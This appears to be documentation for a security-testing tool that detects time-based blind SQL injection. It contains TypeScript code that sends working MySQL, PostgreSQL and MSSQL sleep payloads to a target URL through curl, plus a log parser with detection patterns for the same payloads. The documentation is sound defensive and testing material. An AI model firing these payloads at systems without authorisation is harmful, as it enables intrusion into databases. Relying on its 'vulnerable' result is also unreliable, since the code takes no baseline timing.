sqli_blind_time
Detect time-based blind SQL injection vulnerabilities by sending sleep-inducing payloads and measuring response delays in MySQL, PostgreSQL, and MSSQL databases.
Instructions
Time-based blind SQLi detection for MySQL, PostgreSQL, and MSSQL. Sends sleep-inducing payloads and measures response time to detect injection. Returns vulnerable, dbtype, and results array with payload, response_time, triggered. Side effects: Read-only but slow (each payload waits up to delay_seconds). Sends 3 requests.
Input Schema
| Name | Required | Description | Default |
|---|---|---|---|
| url | Yes | Full URL with injectable parameter | |
| parameter | Yes | Vulnerable parameter name | |
| dbtype | No | Target database type | |
| delay_seconds | No | Sleep duration for true condition | |
Implementation Reference
- src/tools/sqli.ts:316-373 (handler)
  The handler function for sqli_blind_time executes the time-based SQL injection logic by sending sleep-inducing payloads and measuring response times.

  ```typescript
  async ({ url, parameter, dbtype = "mysql", delay_seconds = 3 }) => {
    requireTool("curl");
    // Any query string already present on the URL is discarded; only the
    // tested parameter is sent.
    const baseUrl = url.split("?")[0];

    // Three delay payloads per database family.
    const sleepPayloads: Record<string, string[]> = {
      mysql: [
        `' AND IF(1=1, SLEEP(${delay_seconds}), 0)-- -`,
        `' AND (SELECT SLEEP(${delay_seconds}))-- -`,
        `' OR SLEEP(${delay_seconds})-- -`,
      ],
      postgresql: [
        `' AND pg_sleep(${delay_seconds})-- -`,
        `'; SELECT pg_sleep(${delay_seconds})-- -`,
        `' || pg_sleep(${delay_seconds})-- -`,
      ],
      mssql: [
        `'; WAITFOR DELAY '0:0:${delay_seconds}'-- -`,
        `' AND 1=1; WAITFOR DELAY '0:0:${delay_seconds}'-- -`,
        `'; IF(1=1) WAITFOR DELAY '0:0:${delay_seconds}'-- -`,
      ],
    };

    const results = [];
    for (const payload of sleepPayloads[dbtype]) {
      // curl prints only the total transfer time; the response body is discarded.
      const res = await runCmd(
        "curl",
        [
          "-sk",
          "-o", "/dev/null",
          "-w", "%{time_total}",
          // The payload contains spaces, so it is percent-encoded to keep the URL valid.
          `${baseUrl}?${parameter}=${encodeURIComponent(payload)}`,
        ],
        { timeout: delay_seconds + 15 }
      );

      let elapsed = 0.0;
      try {
        elapsed = parseFloat(res.stdout);
        if (isNaN(elapsed)) elapsed = 0.0;
      } catch {
        elapsed = 0.0;
      }

      // A response that took at least 80% of the requested delay counts as triggered.
      // No baseline request is measured, so an endpoint that is slow anyway also trips this.
      const triggered = elapsed >= delay_seconds * 0.8;
      results.push({
        payload,
        response_time_seconds: Math.round(elapsed * 100) / 100,
        triggered,
      });
    }

    const anyTriggered = results.some((r) => r.triggered);
    const result = {
      vulnerable: anyTriggered,
      dbtype,
      delay_seconds,
      results,
    };
    return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] };
  }
  ```

- src/tools/sqli.ts:307-315 (registration)
  Registration of the sqli_blind_time tool including its schema definition and description.

  ```typescript
  server.tool(
    "sqli_blind_time",
    "Time-based blind SQLi detection for MySQL, PostgreSQL, and MSSQL. Sends sleep-inducing payloads and measures response time to detect injection. Returns vulnerable, dbtype, and results array with payload, response_time, triggered. Side effects: Read-only but slow (each payload waits up to delay_seconds). Sends 3 requests.",
    {
      url: z.string().describe("Full URL with injectable parameter"),
      parameter: z.string().describe("Vulnerable parameter name"),
      dbtype: z.enum(["mysql", "postgresql", "mssql"]).optional().describe("Target database type"),
      delay_seconds: z.number().min(1).max(10).optional().describe("Sleep duration for true condition"),
    },
  ```
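Seen from the server side, probes like these leave the three delay primitives in the query string of the access log. The following is an added example, not part of the project's code: it decodes query values (including double encoding), flags the delay primitives, and reuses the handler's 0.8 factor to mark requests where the server actually waited. The log layout and the names `DelayProbe`, `decodeValue` and `findDelayProbes` are assumptions made for illustration.

```typescript
// Added example (not project code); log layout "METHOD TARGET STATUS SECONDS" is assumed.
interface DelayProbe { line: number; param: string; family: string; requested: number; delayed: boolean }

// Delay primitives of the three payload families; group 1 captures the seconds.
const DELAY_PATTERNS: Array<[string, RegExp]> = [
  ["mysql", /\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)/i],
  ["postgresql", /\bpg_sleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)/i],
  ["mssql", /\bwaitfor\s+delay\s+'\d+:\d+:(\d+(?:\.\d+)?)'/i],
];

// Decode "+" and percent-encoding; a second pass catches double-encoded values.
function decodeValue(raw: string): string {
  let out = raw.replace(/\+/g, " ");
  for (let i = 0; i < 2; i++) {
    try { out = decodeURIComponent(out); } catch { break; } // malformed: keep last good form
  }
  return out;
}

function findDelayProbes(log: string[]): DelayProbe[] {
  const probes: DelayProbe[] = [];
  log.forEach((entry, idx) => {
    const [, target = "", , secs = "0"] = entry.split(" ");
    const query = target.split("?")[1] ?? "";
    for (const pair of query.split("&")) {
      const eq = pair.indexOf("=");
      if (eq < 0) continue;
      const value = decodeValue(pair.slice(eq + 1));
      for (const [family, re] of DELAY_PATTERNS) {
        const m = re.exec(value);
        if (!m) continue;
        const requested = Number(m[1]);
        // delayed: response took >= 80% of the requested sleep, so the query likely ran it.
        probes.push({ line: idx + 1, param: pair.slice(0, eq), family, requested, delayed: Number(secs) >= requested * 0.8 });
        break;
      }
    }
  });
  return probes;
}

// Constructed sample log lines.
const SAMPLE_LOG = [
  "GET /item?id=7 200 0.041",
  "GET /item?id=1%27%20AND%20IF(1=1,%20SLEEP(3),%200)--%20- 200 3.052",
  "GET /search?q=sleep+apnea 200 0.120",
  "GET /item?id=1%27;%20WAITFOR%20DELAY%20%270:0:3%27--%20- 500 0.018",
  "GET /item?cat=2&id=1%2527%2520%257C%257C%2520pg_sleep(3)--%2520- 200 0.030",
];
```

An entry with `delayed: true` is the one to triage first: the parameter it names should be checked for string-built SQL and moved to a parameterized query.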